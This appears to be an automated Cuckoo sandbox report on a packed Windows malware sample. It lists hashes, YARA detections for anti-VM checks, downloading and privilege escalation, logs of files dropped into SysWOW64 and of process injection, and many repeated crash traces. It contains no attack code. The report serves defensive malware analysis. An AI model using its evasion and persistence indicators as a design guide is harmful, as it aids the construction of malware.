File 505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2

Size 75.6KB
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 d57cc2304c405554af3832ee80e8d8d0
SHA1 c90a1020ecb7c5065b5750d980682af844ac1f98
SHA256 505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2
SHA512
efbd016904aa1ad3fdc3d13b183ff5989cd3e92fa30829a12b9936916c1ef1d48765538d1c56d50fe26cca7d8e902f943dd35f33a959f5a99cebe1b24d493a4c
CRC32 AAEFBF2F
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
  • anti_dbg - Checks if being debugged
  • network_udp_sock - Communications over UDP network
  • network_tcp_listen - Listen for incoming communication
  • network_smtp_raw - Communications smtp
  • network_dropper - File downloader/dropper
  • network_tcp_socket - Communications over RAW socket
  • network_dns - Communications use DNS
  • escalate_priv - Escalade priviledges
  • win_mutex - Create or check mutex

Score

This file is very suspicious, with a score of 10 out of 10!

Please notice: The scoring system is currently still in development and should be considered an alpha feature.



Information on Execution

Analysis
Category Started Completed Duration Routing
FILE Jan. 25, 2025, 9:06 a.m. Jan. 25, 2025, 9:13 a.m. 419 seconds internet

Analyzer Log

2025-01-21 09:10:50,030 [analyzer] DEBUG: Starting analyzer from: C:\tmpqqrt4a
2025-01-21 09:10:50,046 [analyzer] DEBUG: Pipe server name: \??\PIPE\wRFpHCEQZMVautmIy
2025-01-21 09:10:50,046 [analyzer] DEBUG: Log pipe server name: \??\PIPE\vfaqqtzRhOEjHpXlXedJYvfB
2025-01-21 09:10:50,328 [analyzer] DEBUG: Started auxiliary module Curtain
2025-01-21 09:10:50,328 [analyzer] DEBUG: Started auxiliary module DbgView
2025-01-21 09:10:50,983 [analyzer] DEBUG: Started auxiliary module Disguise
2025-01-21 09:10:51,203 [analyzer] DEBUG: Loaded monitor into process with pid 504
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module Human
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module Reboot
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-01-21 09:10:51,437 [lib.api.process] INFO: Successfully executed process from path u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2.exe' with arguments '' and pid 668
2025-01-21 09:10:51,655 [analyzer] DEBUG: Loaded monitor into process with pid 668
2025-01-21 09:10:51,655 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\ctfmen.exe
2025-01-21 09:10:51,717 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\shervans.dll
2025-01-21 09:10:51,733 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\grcopy.dll
2025-01-21 09:10:51,828 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\satornas.dll
2025-01-21 09:10:55,905 [analyzer] INFO: Injected into process with pid 2496 and name u'ctfmen.exe'
2025-01-21 09:10:56,062 [analyzer] DEBUG: Loaded monitor into process with pid 2496
2025-01-21 09:10:56,140 [analyzer] INFO: Injected into process with pid 1560 and name u'smnss.exe'
2025-01-21 09:10:56,328 [analyzer] DEBUG: Loaded monitor into process with pid 1560
2025-01-21 09:10:56,342 [analyzer] INFO: Added new file to list with pid 1560 and path C:\Windows\SysWOW64\zipfi.dll
2025-01-21 09:10:56,453 [analyzer] INFO: Process with pid 668 has terminated
2025-01-21 09:10:56,453 [analyzer] INFO: Added new file to list with pid 1560 and path C:\Windows\SysWOW64\zipfiaq.dll
2025-01-21 09:10:57,453 [analyzer] INFO: Process with pid 2496 has terminated
2025-01-21 09:11:20,453 [analyzer] INFO: Analysis timeout hit, terminating analysis.
2025-01-21 09:11:21,000 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-01-21 09:11:21,000 [lib.api.process] INFO: Successfully terminated process with pid 1560.
2025-01-21 09:11:21,046 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-01-25 09:06:06,986 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:08,020 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:09,162 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:10,193 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:11,225 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:12,253 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:13,281 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:14,309 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:15,404 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:16,497 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:17,525 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:18,543 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:19,562 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:20,588 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:21,619 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:22,647 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:23,669 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:24,692 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:25,724 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:26,750 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:27,769 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:28,792 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:29,821 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:30,858 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:31,883 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:32,903 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:33,929 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:34,951 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:35,973 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:37,026 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:38,072 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:39,112 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:40,276 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:41,334 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:42,377 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:43,433 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:44,504 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:45,553 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:46,606 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:47,664 [cuckoo.core.scheduler] INFO: Task #5822691: acquired machine win7x6428 (label=win7x6428)
2025-01-25 09:06:47,666 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.228 for task #5822691
2025-01-25 09:06:48,073 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 1483394 (interface=vboxnet0, host=192.168.168.228)
2025-01-25 09:06:48,223 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x6428
2025-01-25 09:06:49,140 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x6428 to vmcloak
2025-01-25 09:09:36,643 [cuckoo.core.guest] INFO: Starting analysis #5822691 on guest (id=win7x6428, ip=192.168.168.228)
2025-01-25 09:09:37,686 [cuckoo.core.guest] DEBUG: win7x6428: not ready yet
2025-01-25 09:09:42,729 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x6428, ip=192.168.168.228)
2025-01-25 09:09:42,836 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x6428, ip=192.168.168.228, monitor=latest, size=6660546)
2025-01-25 09:09:44,176 [cuckoo.core.resultserver] DEBUG: Task #5822691: live log analysis.log initialized.
2025-01-25 09:09:45,327 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:45,760 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:46,737 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'shots/0001.jpg'
2025-01-25 09:09:46,785 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 133462
2025-01-25 09:09:50,166 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:50,416 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:58,851 [cuckoo.core.guest] DEBUG: win7x6428: analysis #5822691 still processing
2025-01-25 09:10:13,956 [cuckoo.core.guest] DEBUG: win7x6428: analysis #5822691 still processing
2025-01-25 09:10:14,896 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'curtain/1737447080.7.curtain.log'
2025-01-25 09:10:14,899 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 36
2025-01-25 09:10:15,169 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'sysmon/1737447080.98.sysmon.xml'
2025-01-25 09:10:15,193 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 1829434
2025-01-25 09:10:15,211 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/54b8bd60fc3eabf4_grcopy.dll'
2025-01-25 09:10:15,239 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 77445
2025-01-25 09:10:15,248 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/148a0a0924609c80_zipfi.dll'
2025-01-25 09:10:15,251 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/63488a12a838c317_ctfmen.exe'
2025-01-25 09:10:15,253 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 4160
2025-01-25 09:10:15,254 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/102117c293b95753_zipfiaq.dll'
2025-01-25 09:10:15,256 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/c802dedc75563502_satornas.dll'
2025-01-25 09:10:15,258 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 183
2025-01-25 09:10:15,259 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/63c6baedc304dd34_shervans.dll'
2025-01-25 09:10:15,261 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 8704
2025-01-25 09:10:15,262 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 77559
2025-01-25 09:10:15,264 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 77563
2025-01-25 09:10:15,736 [cuckoo.core.resultserver] DEBUG: Task #5822691 had connection reset for <Context for LOG>
2025-01-25 09:10:16,972 [cuckoo.core.guest] INFO: win7x6428: analysis completed successfully
2025-01-25 09:10:16,989 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-01-25 09:10:17,020 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-01-25 09:10:18,433 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x6428 to path /srv/cuckoo/cwd/storage/analyses/5822691/memory.dmp
2025-01-25 09:10:18,453 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x6428
2025-01-25 09:13:05,762 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.228 for task #5822691
2025-01-25 09:13:06,193 [cuckoo.core.scheduler] DEBUG: Released database task #5822691
2025-01-25 09:13:06,214 [cuckoo.core.scheduler] INFO: Task #5822691: analysis procedure completed

Signatures

Yara rules detected for file (10 events)
description Possibly employs anti-virtualization techniques rule vmdetect
description Checks if being debugged rule anti_dbg
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications smtp rule network_smtp_raw
description File downloader/dropper rule network_dropper
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Escalade priviledges rule escalate_priv
description Create or check mutex rule win_mutex
Checks if process is being debugged by a debugger (2 events)
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Tries to locate where the browsers are installed (1 event)
file C:\Program Files (x86)\Mozilla Firefox\browser\blocklist.xml
The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)
section y901bdip
section 395zfvyb
section 4008cvbx
section
The executable uses a known packer (1 event)
packer MinGW GCC 3.x
One or more processes crashed (14 events)
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 68221120
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 68221160
registers.edx: 2047
registers.ebx: 8855144
registers.esi: 8344784
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 66123968
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 66124008
registers.edx: 2047
registers.ebx: 8855048
registers.esi: 8344976
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 70318272
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 70318312
registers.edx: 2047
registers.ebx: 8854952
registers.esi: 8344784
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 72415424
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 72415464
registers.edx: 2047
registers.ebx: 8857016
registers.esi: 8346912
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 74512576
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 74512616
registers.edx: 2047
registers.ebx: 8855000
registers.esi: 8344912
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 76609728
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 76609768
registers.edx: 2047
registers.ebx: 8854360
registers.esi: 8344160
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 80804032
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 80804072
registers.edx: 2047
registers.ebx: 8854616
registers.esi: 8344624
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 76609728
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 76609768
registers.edx: 2047
registers.ebx: 8854744
registers.esi: 8344656
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 82901184
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 82901224
registers.edx: 2047
registers.ebx: 8854536
registers.esi: 8344336
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 84998336
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 84998376
registers.edx: 2047
registers.ebx: 8855480
registers.esi: 8345504
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 87095488
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 87095528
registers.edx: 2047
registers.ebx: 8855432
registers.esi: 8345280
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
